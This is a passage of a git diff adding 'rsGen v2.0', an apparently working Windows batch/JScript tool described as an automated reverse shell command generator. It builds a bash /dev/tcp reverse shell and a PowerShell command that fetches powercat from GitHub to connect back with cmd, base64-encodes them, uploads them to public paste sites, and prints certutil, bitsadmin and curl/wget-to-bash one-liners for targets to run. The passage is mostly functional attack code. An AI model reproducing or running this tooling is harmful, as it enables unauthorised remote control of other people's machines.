+:rs_command_generate_pub_outpub_linuxw10_end + +:rs_command_generate_pub_outpub_wl10_start +if "!rs_pastebin_status!"=="0" echo  certutil -urlcache -split -f !rs_pastebin_url!.txt cd.bat^|cd.bat^|^|curl !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_dpaste_status!"=="0" echo  certutil -urlcache -split -f !rs_dpaste_url!.txt cd.bat^|cd.bat^|^|curl !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +if "!rs_pastebin_status!"=="0" echo  bitsadmin /transfer n !rs_pastebin_url!.txt %%cd%%\cd.bat^|cd.bat^|^|curl !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_pastebin_status!"=="0" echo  powershell "Import-Module BitsTransfer;start-bitstransfer !rs_pastebin_url!.txt cd.bat"^|cd.bat^|^|curl !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +goto :eof +:rs_command_generate_pub_outpub_wl10_end + +:rs_command_generate_pub_outpub_windowsw7_start +if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_pastebin_url!.txt cd.bat^|cd.bat +echo, +if "!rs_dpaste_status!"=="0" echo certutil -urlcache -split -f !rs_dpaste_url!.txt cd.bat^|cd.bat +echo, +if "!rs_pastebin_status!"=="0" echo bitsadmin /transfer n !rs_pastebin_url!.txt %%cd%%\cd.bat^|cd.bat +echo, +if "!rs_pastebin_status!"=="0" echo powershell "Import-Module bitstransfer;start-bitstransfer !rs_pastebin_url!.txt cd.bat"^|cd.bat +echo, +goto :eof +:rs_command_generate_pub_outpub_windowsw7_end + +:rs_command_generate_pub_outpub_linuxw7_start +if "!rs_pastebin_status!"=="0" echo curl !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_dpaste_status!"=="0" echo curl !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +if "!rs_pastebin_status!"=="0" echo wget -qO- !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_dpaste_status!"=="0" echo wget -qO- !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +goto :eof +:rs_command_generate_pub_outpub_linuxw7_end + +:rs_command_generate_pub_outpub_wl7_start +if "!rs_pastebin_status!"=="0" echo certutil -urlcache -split -f !rs_pastebin_url!.txt cd.bat^|cd.bat^|^|curl !rs_pastebin_url!.txt^|base64 -d^|bash +echo, +if "!rs_dpaste_status!"=="0" echo certutil -urlcache -split -f !rs_dpaste_url!.txt cd.bat^|cd.bat^|^|curl !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +if "!rs_pastebin_status!"=="0" echo bitsadmin /transfer n !rs_pastebin_url!.txt %%cd%%\cd.bat^|cd.bat^|^|curl !rs_dpaste_url!.txt^|base64 -d^|bash +echo, +if "!rs_pastebin_status!"=="0" echo "powershell "Import-Module BitsTransfer;start-bitstransfer !rs_pastebin_url!.txt cd.bat"|cd.bat^|^|curl !rs_pastebin_url!.txt^|base64 -d^|bash" +echo, +goto :eof +:rs_command_generate_pub_outpub_wl7_end + +::"transfer command" generation +:rs_command_generate_pub_start +set rs_listen_host= +set rs_listen_port= +set rs_listen_host=%1 +set rs_listen_port=%2 +set "rs_ps_command_pre=&powershell -EP Bypass -NoLogo -NonI -NoP -Enc " +set "ps_command_suf_raw=IEX (New-Object System.Net.Webclient).DownloadString(''https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'');powercat -c !rs_listen_host! -p !rs_listen_port! -e cmd" +set "linux_command_raw=/bin/bash -i>&/dev/tcp/!rs_listen_host!/!rs_listen_port! 0>&1" +call :rs_base64_encode_start "!linux_command_raw!" +set rs_linux_command_b64=%rsgen_b64_res% +::echo %rs_linux_command_b64% +powershell -c "[Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes('%ps_command_suf_raw%'))|out-file -Encoding ascii %temp%\rs_temp_input.rsg" +set /p rs_ps_command_suf_b64=<%temp%\rs_temp_input.rsg +::echo %rs_ps_command_suf_b64% +set "rs_command_b64=!rs_linux_command_b64!!rs_ps_command_pre!!rs_ps_command_suf_b64!" +::echo !rs_command_b64!>%temp%\rs_command_b64.rsg +call :rs_command_upload_start +if "!rs_pastebin_status!"=="-1" ( + if "!rs_dpaste_status!"=="-1" ( + echo, + powershell -c write-host "' Command upload failed, make sure you can access the internet, check local proxy settings, or make sure the pastebin API is available'" -f red 2>nul + goto rs_help_start + ) +) +goto :eof +:rs_command_generate_pub_end + +::Upload command to pastebin +:rs_command_upload_start +echo * Uploading command to pastebin... +set "url=http://p.ip.fi/" +set "urlfilepath=%temp%\rs_temp_input.rsg" +set "ipfilepath=%temp%\rs_temp_output.rsg" +if exist "%temp%\rs_temp_input.rsg" del /q %temp%\rs_temp_input.rsg +call :rs_http_post_start "%url%" "paste=!rs_command_b64!" "%urlfilepath%" "%rs_listen_host%" "%ipfilepath%" +if exist "%temp%\rs_temp_input.rsg" ( + echo + Upload command to pastebin Success. + set rs_pastebin_status=0 + set /p rs_pastebin_url=<%temp%\rs_temp_input.rsg +) else ( + set rs_pastebin_status=-1 + powershell -c write-host "' - Upload command to pastebin Failed!'" -f red 2>nul +) +set "url=http://dpaste.com/api/v2/" +set "urlfilepath=%temp%\rs_temp_input.rsg" +set "ipfilepath=%temp%\rs_temp_output.rsg" +if exist "%temp%\rs_temp_input.rsg" del /q %temp%\rs_temp_input.rsg +call :rs_http_post_start "%url%" "content=!rs_command_b64!" "%urlfilepath%" "%rs_listen_host%" "%ipfilepath%" +if exist "%temp%\rs_temp_input.rsg" ( + echo + Upload command to dpaste Success. + set rs_dpaste_status=0 + set /p rs_dpaste_url=<%temp%\rs_temp_input.rsg +) else ( + set rs_dpaste_status=-1 + powershell -c write-host "' - Upload command to dpaste Failed!'" -f red 2>nul +) +goto :eof +:rs_command_upload_end + +::Embedded js code to achieve command upload function +:rs_http_post_start +cscript //E:JScript //nologo "%~f0" "%~nx0" %* +goto :eof +@if (@rsgen) == (@RSGEN) @end *****/ +var args = WScript.Arguments; +var xhr = new ActiveXObject("WinHttp.WinHttpRequest.5.1"); +var AdoDBObj = new ActiveXObject("ADODB.Stream"); +if (args.Length == 6 ) { + url = args.Item(1) + data = args.Item(2).replace("+", "%2B").replace("&", "%26"); + filename = args.Item(3) + ip = args.Item(4) + ipfilename = args.Item(5) + request(url); + writeFile(ipfilename,ip2dec(ip)); + WScript.Quit(666); +} +if (args.Length == 4 ) { + url = args.Item(1) + data = args.Item(2).replace("+", "%2B").replace("&", "%26"); + filename = args.Item(3) + request(url); + WScript.Quit(666); +} +if (args.Length == 3 ) { + ip = args.Item(1) + ipfilename = args.Item(2) + writeFile(ipfilename,ip2dec(ip)); + WScript.Quit(666); +} +if (args.Length == 1 ) { + WScript.Quit(-1); +} +function request(url) { + var RESOLVE_TIMEOUT = 50000; + var CONNECT_TIMEOUT = 10000; + var SEND_TIMEOUT = 10000; + var RECEIVE_TIMEOUT = 10000; + xhr.open('POST', url, false); + xhr.Option(4) = 13056; + xhr.SetRequestHeader("User-Agent", "Mozilla/5.0 (iPhone; CPU iPhone OS 5_0 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9A334 Safari/7534.48.3"); + xhr.SetRequestHeader("Referer", "http://www.google.com/") + xhr.setRequestHeader("Content-Type","application/x-www-form-urlencoded") + xhr.SetRequestHeader("Connection", "Close") + xhr.SetTimeouts(RESOLVE_TIMEOUT, CONNECT_TIMEOUT, SEND_TIMEOUT, RECEIVE_TIMEOUT); + try { + xhr.send(data); + xhr.WaitForResponse; + //WScript.Echo(xhr.responseText); + } catch(e) { + WScript.Quit(-1); + } + writeFile(filename,xhr.responseText); +} +function writeFile(fileName, data) { + AdoDBObj.Type = 2; + AdoDBObj.CharSet = "iso-8859-1"; + AdoDBObj.Open(); + AdoDBObj.Position = 0; + AdoDBObj.WriteText(data); + AdoDBObj.SaveToFile(fileName, 2); + AdoDBObj.Close(); +} +function ip2dec(ip) { + var ipreg = /^(\d{0,3}\.){3}.(\d{0,3})$|^(\d{0,3}\.){5}.(\d{0,3})$/; + var valid = ipreg.test(ip); + if (!valid) { + return false; + } + var dots = ip.split('.'); + for (var i = 0; i < dots.length; i++) { + var dot = dots[i]; + if (dot > 255 || dot < 0) { + return false; + } + } + if (dots.length == 4) { + return ((((((+dots[0])*256)+(+dots[1]))*256)+(+dots[2]))*256)+(+dots[3]); + } else { + return false; + } +} +@if (@rsgen) == (@RSGEN) @end /***** JS +:rs_http_post_end + +::banner +:rs_banner_w7_start +echo ______ ________ ____ _____ +echo .' ___ ^|^|_ __ ^|^|_ \^|_ _^| +echo _ .--. .--. / .' \_^| ^| ^|_ \_^| ^| \ ^| ^| +echo [ `/'`\]( (`\]^| ^| ____ ^| _^| _ ^| ^|\ \^| ^| +echo ^| ^| `'.'.\ `.___] ^|_^| ^|__/ ^| _^| ^|_\ ^|_ +echo [___] [\__) )`._____.'^|________^|^|_____^|\____^| v2.0 +echo, +goto :eof +:rs_banner_w7_end + +:rs_banner_w10_start +echo  ______ ________ ____ _____ +echo  .' ___ ^|^|_ __ ^|^|_ \^|_ _^|  +echo  _ .--. .--. / .' \_^| ^| ^|_ \_^| ^| \ ^| ^| +echo  [ `/'`\]( (`\]^| ^| ____ ^| _^| _ ^| ^|\ \^| ^| +echo  ^| ^| `'.'.\ `.___] ^|_^| ^|__/ ^| _^| ^|_\ ^|_ +echo  [___] [\__) )`._____.'^|________^|^|_____^|\____^| v2.0 +echo, +goto :eof +:rs_banner_w10_end + +:rs_info_w10windows_start +echo  Windows Command  +echo, +goto :eof +:rs_info_w10windows_end + +:rs_info_w7windows_start +powershell -c write-host "' Windows Command'" -f yellow 2>nul +echo, +goto :eof +:rs_info_w7windows_end + +:rs_info_w10linux_start +echo  Linux Command +echo, +goto :eof +:rs_info_w10linux_end + +:rs_info_w7linux_start +powershell -c write-host "' Linux Command'" -f yellow 2>nul +echo, +goto :eof +:rs_info_w7linux_end + +:rs_info_wlinux10_start +echo  Windows^&Linux +echo, +goto :eof +:rs_info_wlinux10_end + +:rs_info_wlinux7_start +powershell -c write-host "' Windows&Linux'" -f yellow 2>nul +echo, +goto :eof +:rs_info_wlinux7_end + +::help info +:rs_help_start +echo, +echo This is an automated Reverse Shell Command Genrator. +echo, +echo Usage: %~nx0 host port [options] +echo Options: +echo -pub If the target can access the public network, use it. +echo -lan If the target cannot access the public network, use it. +echo -listen If you need to listen the port, use it. +echo -ngrok Start ngrok TCP Tunnel(Contains -pub, -listen options). +echo -pgrok Start a TCP Tunnel(like ngrok but free and unlimited). +echo, +echo Examples: %~nx0 8.8.8.8 8888 +echo %~nx0 8.8.8.8 8888 -pub +echo %~nx0 192.168.31.216 8888 -lan +echo %~nx0 192.168.31.216 8888 -listen +echo %~nx0 192.168.31.216 8888 -lan -listen +echo %~nx0 8888 -ngrok +echo %~nx0 8888 -pgrok +exit /b 0 +:rs_help_end +@if (@rsgen) == (@RSGEN) @end JS *****/ \ No newline at end of file diff --git a/runcmd.bat b/runcmd.bat new file mode 100644 index 0000000..52483ba --- /dev/null +++ b/runcmd.bat @@ -0,0 +1 @@ +@cmd /k cd %cd%\ \ No newline at end of file